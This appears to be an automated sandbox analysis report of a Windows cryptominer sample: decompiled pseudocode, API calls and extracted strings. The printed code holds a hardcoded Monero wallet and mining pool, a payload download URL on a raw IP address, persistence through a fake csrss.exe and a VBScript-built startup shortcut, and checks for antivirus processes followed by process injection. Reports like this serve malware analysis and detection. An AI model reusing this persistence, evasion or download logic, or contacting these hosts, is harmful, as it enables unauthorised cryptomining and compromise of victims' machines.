                                                                                                        0x00404a7a
                                                                                                        0x00404a7f
                                                                                                        0x00404a88
                                                                                                        0x00404a8c
                                                                                                        0x00404a8f
                                                                                                        0x00404a94
                                                                                                        0x00404a94
                                                                                                        0x00404aae
                                                                                                        0x00404aca
                                                                                                        0x00404acf
                                                                                                        0x00404acf
                                                                                                        0x00404ad8
                                                                                                        0x00404add
                                                                                                        0x00404add
                                                                                                        0x00404a7f
                                                                                                        0x00404a59
                                                                                                        0x00404ae5
                                                                                                        0x00000000
                                                                                                        0x00404ae5
                                                                                                        0x00404a19
                                                                                                        0x00404a1b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404a1d
                                                                                                        0x00404a1e
                                                                                                        0x00404a23
                                                                                                        0x00404a26
                                                                                                        0x00000000
                                                                                                        0x00404a26
                                                                                                        0x00404a0c
                                                                                                        0x00404a0e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404a0e
                                                                                                        0x004049ff
                                                                                                        0x004049ff
                                                                                                        0x00404a01
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404a01
                                                                                                        0x004049b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004049c0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004049c9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004049cd
                                                                                                        0x004049d0
                                                                                                        0x004049d5
                                                                                                        0x004049d5
                                                                                                        0x004049e1
                                                                                                        0x004049e6
                                                                                                        0x004049e9
                                                                                                        0x004049f0
                                                                                                        0x004049f2
                                                                                                        0x00000000
                                                                                                        0x004049f2
                                                                                                        0x00404946
                                                                                                        0x00404946
                                                                                                        0x0040494c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404956
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404963
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404970
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404978
                                                                                                        0x0040497b
                                                                                                        0x00404980
                                                                                                        0x00404983
                                                                                                        0x00404983
                                                                                                        0x0040498c
                                                                                                        0x00404997
                                                                                                        0x0040499c
                                                                                                        0x0040499f
                                                                                                        0x004049a1
                                                                                                        0x004049a1
                                                                                                        0x004049a8
                                                                                                        0x00000000
                                                                                                        0x004049a8
                                                                                                        0x004048d4
                                                                                                        0x00404853
                                                                                                        0x004047cd
                                                                                                        0x004046b6
                                                                                                        0x004046b6
                                                                                                        0x004046bc
                                                                                                        0x004046c4
                                                                                                        0x004046d4
                                                                                                        0x004046d9
                                                                                                        0x004046dc
                                                                                                        0x004046e9
                                                                                                        0x004046ee
                                                                                                        0x004046f3
                                                                                                        0x004047d5
                                                                                                        0x004047d5
                                                                                                        0x00404705
                                                                                                        0x00404715
                                                                                                        0x00404726
                                                                                                        0x00404737
                                                                                                        0x0040473c
                                                                                                        0x0040474e
                                                                                                        0x00404754
                                                                                                        0x00404756
                                                                                                        0x00404767
                                                                                                        0x0040476c
                                                                                                        0x0040476f
                                                                                                        0x00404771
                                                                                                        0x00404773
                                                                                                        0x00404778
                                                                                                        0x0040477e
                                                                                                        0x00404783
                                                                                                        0x00404783
                                                                                                        0x00404799
                                                                                                        0x0040479e
                                                                                                        0x004047a3
                                                                                                        0x004047a5
                                                                                                        0x004047b0
                                                                                                        0x004047b5
                                                                                                        0x004047b5
                                                                                                        0x00000000
                                                                                                        0x004047a3
                                                                                                        0x0040475a
                                                                                                        0x0040475a
                                                                                                        0x00404668
                                                                                                        0x0040466a
                                                                                                        0x0040466a
                                                                                                        0x0040465d
                                                                                                        0x00404627
                                                                                                        0x00404627
                                                                                                        0x00404607
                                                                                                        0x00404607
                                                                                                        0x004045e9
                                                                                                        0x004045c9
                                                                                                        0x004045cb
                                                                                                        0x004045cb
                                                                                                        0x004045c7
                                                                                                        0x00404586

                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00404487
                                                                                                        • SetErrorMode.KERNELBASE(00000002), ref: 004044E5
                                                                                                        • SetErrorMode.KERNELBASE(00000000), ref: 004044EB
                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,e9c1286a28d82a2d0ee6), ref: 00404506
                                                                                                        • ExitProcess.KERNEL32 ref: 00404512
                                                                                                        • GetLastError.KERNEL32 ref: 0040451E
                                                                                                        • ExitProcess.KERNEL32 ref: 00404529
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Error$ExitModeProcess$CountCreateLastMutexTick
                                                                                                        • String ID: --show-window$3.1.0$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos$C:\ProgramData\LKBNMTFJgl$FALSE$FALSE$FALSE$LKBNMTFJgl$LKBNMTFJgl$csrss.exe$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$e9c1286a28d82a2d0ee6$e9c1286a28d82a2d0ee6$http://45.144.225.135/config.txt$taskmgr.exe$viTRMUuKeV$viTRMUuKeV$xmr-us-east1.nanopool.org:14444$xmr-us-east1.nanopool.org:14444
                                                                                                        • API String ID: 3615071802-544947428
                                                                                                        • Opcode ID: e7c3370e5e554634d6f38dec234f5c2f7b09adaa70533622726b45a566a1b702
                                                                                                        • Instruction ID: deaf04295798d6261b51ffebf117c96f993ab97e4c983c13017be75728aacaa1
                                                                                                        • Opcode Fuzzy Hash: e7c3370e5e554634d6f38dec234f5c2f7b09adaa70533622726b45a566a1b702
                                                                                                        • Instruction Fuzzy Hash: E9F1F7F5E41704B7DB20ABB5AD06B9F36A86B50749F040437FA04B22D2E77C5A44CB6E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403220, Relevance: 65.0, APIs: 3, Strings: 34, Instructions: 237COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E00403220(void* __ecx, void* __esi, void* __eflags) {
				intOrPtr _t10;
				intOrPtr _t14;
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t27;
				void* _t31;
				void* _t35;
				long _t37;
				short _t38;
				void* _t41;
				void* _t43;
				struct HINSTANCE__* _t44;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t48;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				struct HINSTANCE__* _t54;
				intOrPtr _t56;
				struct HINSTANCE__* _t58;
				struct HINSTANCE__* _t60;
				void* _t67;
				void* _t70;
				void* _t73;

				_t67 = __esi;
				_t43 = __ecx;
				 *0x5d1300 = 0;
				 *0x5d1304 = 0;
				 *0x5d1308 = 0;
				 *0x5d130c = 0;
				 *0x5d1310 = 0x7530;
				 *0x5d1238 = 0x5f;
				 *0x5d12bc = 0x18;
				 *0x5d19ac = 0x20;
				 *0x5d19b0 = 5;
				 *0x5d1318 = 0;
				 *0x5d131c = 0;
				 *0x5d1320 = 0;
				 *0x5d1bb8 = 1;
				 *0x5d1bbc = 0xa;
				 *0x5d1bc0 = 0;
				 *0x5d1c24 = 0;
				 *0x5d210c = 1;
				E00401BB0("[no-email]", 0, 0x80);
				E004017E0("[no-email]", "[no-email]");
				E004017E0("d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID_ERROR");
				asm("xorps xmm0, xmm0");
				 *0x5d1c48 = 0;
				asm("movups [0x5d1c28], xmm0");
				asm("movups [0x5d1c38], xmm0");
				E00401BB0("C:\ProgramData\LKBNMTFJgl", 0, 0x208);
				E00401BB0("csrss.exe", 0, 0x60);
				asm("xorps xmm0, xmm0");
				asm("movups [0x5d158c], xmm0");
				asm("movups [0x5d159c], xmm0");
				E00401BB0("http://45.144.225.135/notepad.exe", 0, 0x200);
				E00401BB0(0x5d12c0, 0, 0x40);
				E00401640(0x5d12c0, 0x409df0, 0x40);
				E00401BB0("http://45.144.225.135/config.txt", 0, 0x200);
				_t10 =  *0x5d19ac; // 0x20
				E00401640("http://45.144.225.135/config.txt", 0x409e30, _t10 + 1);
				E00401BB0("FALSE", 0, 0x200);
				_t14 =  *0x5d19b0; // 0x5
				E00401640("FALSE", "FALSE", _t14 + 1);
				_t17 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
				_t73 = _t70 + 0x90;
				if(_t17 != 0) {
					E00401CE0("0125789244697858", 0x10, "http://45.144.225.135/config.txt",  *0x5d19ac);
					_t41 = E004017B0("FALSE", "FALSE");
					_t73 = _t73 + 0x18;
					if(_t41 != 0) {
						E00401CE0("0125789244697858", 0x10, "FALSE",  *0x5d19b0);
						_t73 = _t73 + 0x10;
					}
				}
				_t19 = E00408270(_t43, GetCurrentProcess());
				 *0x5d1314 = _t19;
				if(_t19 != 0) {
					E00408DD0();
					_t60 =  *0x5d1318; // 0x0
					_t61 =  ==  ? 1 : _t60;
					 *0x5d1318 =  ==  ? 1 : _t60;
				}
				_push(_t67);
				E004017B0("TRUE", "TRUE");
				_t44 =  *0x5d1300; // 0x1
				_t45 =  ==  ? 1 : _t44;
				 *0x5d1300 =  ==  ? 1 : _t44;
				E004017B0("TASKMGR", "TASKMGR");
				_t46 =  *0x5d1304; // 0x1
				_t47 =  ==  ? 1 : _t46;
				 *0x5d1304 =  ==  ? 1 : _t46;
				E004017B0("1THREAD", "50%CPU");
				_t48 =  *0x5d1308; // 0x2
				_t49 =  ==  ? 1 : _t48;
				 *0x5d1308 =  ==  ? 1 : _t48;
				E004017B0("50%CPU", "50%CPU");
				_t50 =  *0x5d1308; // 0x2
				_t51 =  ==  ? 2 : _t50;
				 *0x5d1308 =  ==  ? 2 : _t50;
				E004017B0("100%CPU", "50%CPU");
				_t52 =  *0x5d1308; // 0x2
				_t53 =  ==  ? 3 : _t52;
				 *0x5d1308 =  ==  ? 3 : _t52;
				E004017B0("100%CPU", "100%CPU");
				_t54 =  *0x5d130c; // 0x1
				_t55 =  ==  ? 1 : _t54;
				 *0x5d1bb4 = 0x1e;
				 *0x5d130c =  ==  ? 1 : _t54;
				E00401BB0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0, 0x100);
				_t27 =  *0x5d1238; // 0x5f
				E00401640("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x409f40, _t27 + 1);
				E00401CE0("0125789244697858", 0x10, "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  *0x5d1238);
				_t31 = E00401BE0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  *0x5d1238);
				E00401BB0("xmr-us-east1.nanopool.org:14444", 0, 0x80);
				_t56 =  *0x5d12bc; // 0x18
				E00401640("xmr-us-east1.nanopool.org:14444", 0x40a018, _t56 + 1);
				E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444",  *0x5d12bc);
				_t35 = E00401BE0("xmr-us-east1.nanopool.org:14444",  *0x5d12bc);
				if(_t31 != 0xd82f1fb8 || _t35 != 0x789308d0) {
					ExitProcess(0x27);
				}
				E004018D0("xmr-us-east1.nanopool.org:14444", "nicehash.com");
				_t58 =  *0x5d131c; // 0x0
				_t59 =  !=  ? 1 : _t58;
				 *0x5d131c =  !=  ? 1 : _t58;
				_t37 = GetModuleFileNameW(0, "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", 0x200);
				if(_t37 == 0 || _t37 == 0x200) {
					_t38 = 0;
					 *0x5d1c4c = 0;
					goto L12;
				} else {
					_t38 = E00408B20("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "d572da9202196121d952231f26d65d07"); // executed
					if(_t38 == 0) {
						L12:
						 *0x5d1c28 = 0;
						 *0x5d2110 = 0;
						return _t38;
					} else {
						 *0x5d1c48 = 0;
						 *0x5d2110 = 0;
						return _t38;
					}
				}
			}


























                                                                                                        0x00403220
                                                                                                        0x00403220
                                                                                                        0x0040322c
                                                                                                        0x00403236
                                                                                                        0x00403240
                                                                                                        0x0040324a
                                                                                                        0x00403254
                                                                                                        0x0040325e
                                                                                                        0x00403268
                                                                                                        0x00403272
                                                                                                        0x0040327c
                                                                                                        0x00403286
                                                                                                        0x00403290
                                                                                                        0x0040329a
                                                                                                        0x004032a4
                                                                                                        0x004032ae
                                                                                                        0x004032b8
                                                                                                        0x004032c2
                                                                                                        0x004032cc
                                                                                                        0x004032d6
                                                                                                        0x004032e5
                                                                                                        0x004032f4
                                                                                                        0x004032fe
                                                                                                        0x00403301
                                                                                                        0x00403312
                                                                                                        0x00403319
                                                                                                        0x00403320
                                                                                                        0x0040332e
                                                                                                        0x00403338
                                                                                                        0x00403342
                                                                                                        0x00403349
                                                                                                        0x00403350
                                                                                                        0x00403361
                                                                                                        0x00403372
                                                                                                        0x00403383
                                                                                                        0x00403388
                                                                                                        0x00403399
                                                                                                        0x004033aa
                                                                                                        0x004033af
                                                                                                        0x004033c0
                                                                                                        0x004033d2
                                                                                                        0x004033d7
                                                                                                        0x004033dc
                                                                                                        0x004033f0
                                                                                                        0x004033ff
                                                                                                        0x00403404
                                                                                                        0x00403409
                                                                                                        0x0040341d
                                                                                                        0x00403422
                                                                                                        0x00403422
                                                                                                        0x00403409
                                                                                                        0x0040342d
                                                                                                        0x00403435
                                                                                                        0x00403441
                                                                                                        0x00403443
                                                                                                        0x00403448
                                                                                                        0x00403450
                                                                                                        0x00403453
                                                                                                        0x00403453
                                                                                                        0x00403459
                                                                                                        0x00403464
                                                                                                        0x00403469
                                                                                                        0x00403476
                                                                                                        0x0040347e
                                                                                                        0x00403484
                                                                                                        0x00403489
                                                                                                        0x00403496
                                                                                                        0x0040349e
                                                                                                        0x004034a4
                                                                                                        0x004034a9
                                                                                                        0x004034b6
                                                                                                        0x004034be
                                                                                                        0x004034c4
                                                                                                        0x004034c9
                                                                                                        0x004034d6
                                                                                                        0x004034e3
                                                                                                        0x004034e9
                                                                                                        0x004034ee
                                                                                                        0x004034fb
                                                                                                        0x00403508
                                                                                                        0x0040350e
                                                                                                        0x00403513
                                                                                                        0x00403520
                                                                                                        0x00403523
                                                                                                        0x00403534
                                                                                                        0x0040353a
                                                                                                        0x0040353f
                                                                                                        0x00403550
                                                                                                        0x0040356a
                                                                                                        0x0040357a
                                                                                                        0x0040358d
                                                                                                        0x00403592
                                                                                                        0x004035a4
                                                                                                        0x004035bb
                                                                                                        0x004035ce
                                                                                                        0x004035dd
                                                                                                        0x00403673
                                                                                                        0x00403673
                                                                                                        0x004035f8
                                                                                                        0x004035fd
                                                                                                        0x00403608
                                                                                                        0x00403617
                                                                                                        0x0040361d
                                                                                                        0x00403626
                                                                                                        0x00403657
                                                                                                        0x00403659
                                                                                                        0x00000000
                                                                                                        0x0040362f
                                                                                                        0x00403639
                                                                                                        0x00403643
                                                                                                        0x0040365f
                                                                                                        0x0040365f
                                                                                                        0x00403666
                                                                                                        0x00403670
                                                                                                        0x00403645
                                                                                                        0x00403645
                                                                                                        0x0040364c
                                                                                                        0x00403656
                                                                                                        0x00403656
                                                                                                        0x00403643

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(75144D40), ref: 00403426
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe,00000200), ref: 0040361D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentFileModuleNameProcess
                                                                                                        • String ID: 0125789244697858$0125789244697858$0125789244697858$0125789244697858$100%CPU$100%CPU$100%CPU$1THREAD$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos$50%CPU$50%CPU$50%CPU$50%CPU$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe$FALSE$FALSE$FALSE$FALSE$GUID_ERROR$TASKMGR$TASKMGR$TRUE$TRUE$[no-email]$[no-email]$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$d572da9202196121d952231f26d65d07$http://45.144.225.135/config.txt$http://45.144.225.135/notepad.exe$nicehash.com$viTRMUuKeV$xmr-us-east1.nanopool.org:14444
                                                                                                        • API String ID: 2251294070-2925034580
                                                                                                        • Opcode ID: 1c205f2d1241ad2fdd910ba5841d93698afb6b2d468f43393a3cd9dd5d578e36
                                                                                                        • Instruction ID: 5c7772c3a6fcc4d75a1d869b2715d40eb421c31df5170a8a8dddbd709ea8cbad
                                                                                                        • Opcode Fuzzy Hash: 1c205f2d1241ad2fdd910ba5841d93698afb6b2d468f43393a3cd9dd5d578e36
                                                                                                        • Instruction Fuzzy Hash: DA919374781B007AE730AF66AC97F163BA0A760B45F14452FF500762E3D7F968489B8D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004065D0, Relevance: 40.5, APIs: 5, Strings: 18, Instructions: 212sleepfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004065D0(void* __eflags) {
				short _v524;
				short _v1044;
				short _v1564;
				char _v2588;
				char _v3612;
				char _v4636;
				void* _t61;
				void* _t69;
				void* _t71;
				void* _t73;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t128;
				void* _t134;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t150;

				E00401A00( &_v524, "C:\ProgramData\LKBNMTFJgl");
				E00401970( &_v524, "\\");
				E00401970( &_v524, "csrss.exe");
				 *((short*)(_t141 + E00401B40( &_v524) * 2 - 0x210)) = 0;
				E00401A00( &_v1044, "C:\ProgramData\LKBNMTFJgl");
				E00401970( &_v1044, L"\\r.vbs");
				_t61 = E00407FA0(0,  &_v3612, 0x40aad0, 7); // executed
				_t143 = _t142 + 0x38;
				if(_t61 != 0) {
					E00401970( &_v3612, "\\");
					E00401970( &_v3612, "viTRMUuKeV");
					E00401970( &_v3612, L".url");
					_t69 = E00406340( &_v524); // executed
					_t144 = _t143 + 0x1c;
					__eflags = _t69;
					if(_t69 == 0) {
						goto L1;
					} else {
						_t71 = E00407EF0("a2guard.exe"); // executed
						_t145 = _t144 + 4;
						__eflags = _t71;
						if(_t71 != 0) {
							L10:
							_t73 = E00407ED0( &_v3612);
							_t146 = _t145 + 4;
							__eflags = _t73;
							if(_t73 != 0) {
								goto L13;
							} else {
								E00401A00( &_v4636, L"[InternetShortcut]\r\nURL=\"file:///");
								E00401970( &_v4636,  &_v524);
								E00401970( &_v4636, L".exe\"");
								_t100 = E00407AF0( &_v3612,  &_v4636);
								_t146 = _t146 + 0x20;
								__eflags = _t100;
								if(_t100 != 0) {
									goto L13;
								} else {
									goto L12;
								}
							}
						} else {
							_t102 = E00407EF0("a2service.exe"); // executed
							_t145 = _t145 + 4;
							__eflags = _t102;
							if(_t102 != 0) {
								goto L10;
							} else {
								_t103 = E00407EF0("a2start.exe"); // executed
								_t145 = _t145 + 4;
								__eflags = _t103;
								if(_t103 != 0) {
									goto L10;
								} else {
									_t105 = E00407ED0( &_v3612); // executed
									_t146 = _t145 + 4;
									__eflags = _t105;
									if(_t105 != 0) {
										L13:
										E00406990( &_v3612); // executed
										E00401A00( &_v1564,  &_v524);
										E00401970( &_v1564, L".exe");
										DeleteFileW( &_v1564); // executed
										MoveFileW( &_v524,  &_v1564); // executed
										E004068E0( &_v1564); // executed
										DeleteFileW( &_v524); // executed
										return 1;
									} else {
										E00401A00( &_v2588, L"Set objFSO=CreateObject(\"Scripting.FileSystemObject\")\r\n");
										E00401970( &_v2588, L"outFile=\"");
										E00401970( &_v2588,  &_v3612);
										E00401970( &_v2588, L"\"\r\n");
										E00401970( &_v2588, L"Set objFile = objFSO.CreateTextFile(outFile,True)\r\n");
										E00401970( &_v2588, L"objFile.Write \"[InternetShortcut]\" & vbCrLf & \"URL=\"\"file:///");
										E00401970( &_v2588,  &_v524);
										E00401970( &_v2588, L".exe\"\"\"\r\n");
										E00401970( &_v2588, L"objFile.Close\r\n");
										_t128 = E00407AF0( &_v1044,  &_v2588); // executed
										_t150 = _t146 + 0x50;
										__eflags = _t128;
										if(__eflags == 0) {
											L12:
											__eflags = 0;
											return 0;
										} else {
											E00406A40(0, __eflags,  &_v1044); // executed
											Sleep(0xbb8);
											DeleteFileW( &_v1044); // executed
											_t134 = E00407ED0( &_v3612); // executed
											_t146 = _t150 + 8;
											__eflags = _t134;
											if(_t134 != 0) {
												goto L13;
											} else {
												return _t134;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}


























                                                                                                        0x004065e5
                                                                                                        0x004065f6
                                                                                                        0x00406607
                                                                                                        0x0040661f
                                                                                                        0x0040662e
                                                                                                        0x0040663f
                                                                                                        0x00406652
                                                                                                        0x00406657
                                                                                                        0x0040665c
                                                                                                        0x00406670
                                                                                                        0x00406681
                                                                                                        0x00406692
                                                                                                        0x0040669e
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a8
                                                                                                        0x00000000
                                                                                                        0x004066aa
                                                                                                        0x004066b0
                                                                                                        0x004066bb
                                                                                                        0x004066be
                                                                                                        0x004066c0
                                                                                                        0x00406800
                                                                                                        0x00406807
                                                                                                        0x0040680c
                                                                                                        0x0040680f
                                                                                                        0x00406811
                                                                                                        0x00000000
                                                                                                        0x00406813
                                                                                                        0x0040681f
                                                                                                        0x00406832
                                                                                                        0x00406843
                                                                                                        0x00406856
                                                                                                        0x0040685b
                                                                                                        0x0040685e
                                                                                                        0x00406860
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406860
                                                                                                        0x004066c6
                                                                                                        0x004066cb
                                                                                                        0x004066d0
                                                                                                        0x004066d3
                                                                                                        0x004066d5
                                                                                                        0x00000000
                                                                                                        0x004066db
                                                                                                        0x004066e0
                                                                                                        0x004066e5
                                                                                                        0x004066e8
                                                                                                        0x004066ea
                                                                                                        0x00000000
                                                                                                        0x004066f0
                                                                                                        0x004066f7
                                                                                                        0x004066fc
                                                                                                        0x004066ff
                                                                                                        0x00406701
                                                                                                        0x00406869
                                                                                                        0x00406870
                                                                                                        0x00406883
                                                                                                        0x00406894
                                                                                                        0x004068a3
                                                                                                        0x004068b3
                                                                                                        0x004068c0
                                                                                                        0x004068cf
                                                                                                        0x004068da
                                                                                                        0x00406707
                                                                                                        0x00406713
                                                                                                        0x00406724
                                                                                                        0x00406737
                                                                                                        0x00406748
                                                                                                        0x00406759
                                                                                                        0x0040676a
                                                                                                        0x0040677d
                                                                                                        0x0040678e
                                                                                                        0x004067a2
                                                                                                        0x004067b5
                                                                                                        0x004067ba
                                                                                                        0x004067bd
                                                                                                        0x004067bf
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406868
                                                                                                        0x004067c5
                                                                                                        0x004067cc
                                                                                                        0x004067d9
                                                                                                        0x004067e6
                                                                                                        0x004067ef
                                                                                                        0x004067f4
                                                                                                        0x004067f7
                                                                                                        0x004067f9
                                                                                                        0x00000000
                                                                                                        0x004067fb
                                                                                                        0x004067ff
                                                                                                        0x004067ff
                                                                                                        0x004067f9
                                                                                                        0x004067bf
                                                                                                        0x00406701
                                                                                                        0x004066ea
                                                                                                        0x004066d5
                                                                                                        0x004066c0
                                                                                                        0x0040665e
                                                                                                        0x0040665e
                                                                                                        0x00406663
                                                                                                        0x00406663

                                                                                                        APIs
                                                                                                          • Part of subcall function 00407FA0: LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FAA
                                                                                                          • Part of subcall function 00407FA0: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00407FBC
                                                                                                          • Part of subcall function 00407FA0: CoTaskMemFree.OLE32(00000000,0040AAE0), ref: 00407FEF
                                                                                                          • Part of subcall function 00407FA0: FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FF6
                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 004067D9
                                                                                                        • DeleteFileW.KERNELBASE(?), ref: 004067E6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$AddressDeleteFileLoadProcSleepTask
                                                                                                        • String ID: "$.exe$.exe"$.exe"""$.url$C:\ProgramData\LKBNMTFJgl$Set objFSO=CreateObject("Scripting.FileSystemObject")$Set objFile = objFSO.CreateTextFile(outFile,True)$[InternetShortcut]URL="file:///$\r.vbs$a2guard.exe$a2service.exe$a2start.exe$csrss.exe$objFile.Close$objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///$outFile="$viTRMUuKeV
                                                                                                        • API String ID: 976351581-227138989
                                                                                                        • Opcode ID: ed21da9ed8190e7733910bd8be6d59d110209caacd492b3d501ff56708a1c162
                                                                                                        • Instruction ID: e23f127453d0789cff49e1510112eb27c4226e1f4d3e58430ef8cc7bba816ee8
                                                                                                        • Opcode Fuzzy Hash: ed21da9ed8190e7733910bd8be6d59d110209caacd492b3d501ff56708a1c162
                                                                                                        • Instruction Fuzzy Hash: B46101B2D4031C66DB50E6A19C46ECB726C5F05348F0408F7B505F2192EA7DEBA58BAA
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406A40, Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 180processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E00406A40(void* __ecx, void* __eflags, intOrPtr _a4) {
				WCHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				char _v612;
				char _v740;
				short _v1780;
				char _v5876;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t38;
				int _t48;
				void* _t54;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t76;
				signed int _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t84;

				_t71 = __ecx;
				E00401BB0( &_v5876, 0, 0x1000);
				_v8 = 0;
				E00401BB0( &_v740, 0, 0x288);
				E00401670( &_v740, 0, 0x288);
				_t74 = _a4;
				E00401A00( &_v612, _a4);
				_t38 = E00407ED0(_a4); // executed
				_t82 = _t81 + 0x30;
				if(_t38 == 0) {
					return _t38;
				}
				_push(_t68);
				_push(_t76);
				if(E00408DD0() == 0) {
					L22:
					E00401BB0( &_v92, 0, 0x44);
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x14], xmm0");
					E00401A00( &_v1780, L"cmd.exe /C WScript \"");
					E00401970( &_v1780, _t74);
					E00401970( &_v1780, "\"");
					_t48 = E00407ED0(_t74); // executed
					if(_t48 != 0) {
						CreateProcessW(0,  &_v1780, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed
						CloseHandle(_v24.hThread);
						_t48 = CloseHandle(_v24);
					}
					L24:
					return _t48;
				}
				_t54 = E00407EF0("bdagent.exe"); // executed
				_t84 = _t82 + 4;
				if(_t54 != 0) {
					L10:
					_push(0x1000);
					_push( &_v5876);
					if( *0x5d1314 == 0) {
						_push(0);
						_t48 = E004029E0( &_v740, 0x400000, E004080E0(_t68, _t74, _t76),  &_v740, 0x288,  &_v8, E00406CA0);
						_t82 = _t84 + 0x24;
						if(_t48 == 0 || _v8 == 0) {
							goto L22;
						} else {
							goto L24;
						}
					}
					_push(1);
					_t70 = E004080E0(_t68, _t74, _t76);
					_t82 = _t84 + 0xc;
					if(_t70 == 0) {
						goto L22;
					}
					_t79 = 0;
					if(_t70 == 0) {
						goto L22;
					}
					do {
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == 0) {
							goto L18;
						}
						_t75 =  *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0));
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == GetCurrentProcessId()) {
							goto L18;
						}
						_t48 = E004029E0(_t71, 0x400000, _t75,  &_v740, 0x288,  &_v8, E00406CA0);
						_t82 = _t82 + 0x18;
						if(_t48 != 0 && _v8 != 0) {
							goto L24;
						}
						L18:
						_t79 = _t79 + 1;
					} while (_t79 < _t70);
					_t74 = _a4;
					goto L22;
				}
				_t61 = E00407EF0("vsserv.exe"); // executed
				_t84 = _t84 + 4;
				if(_t61 != 0) {
					goto L10;
				}
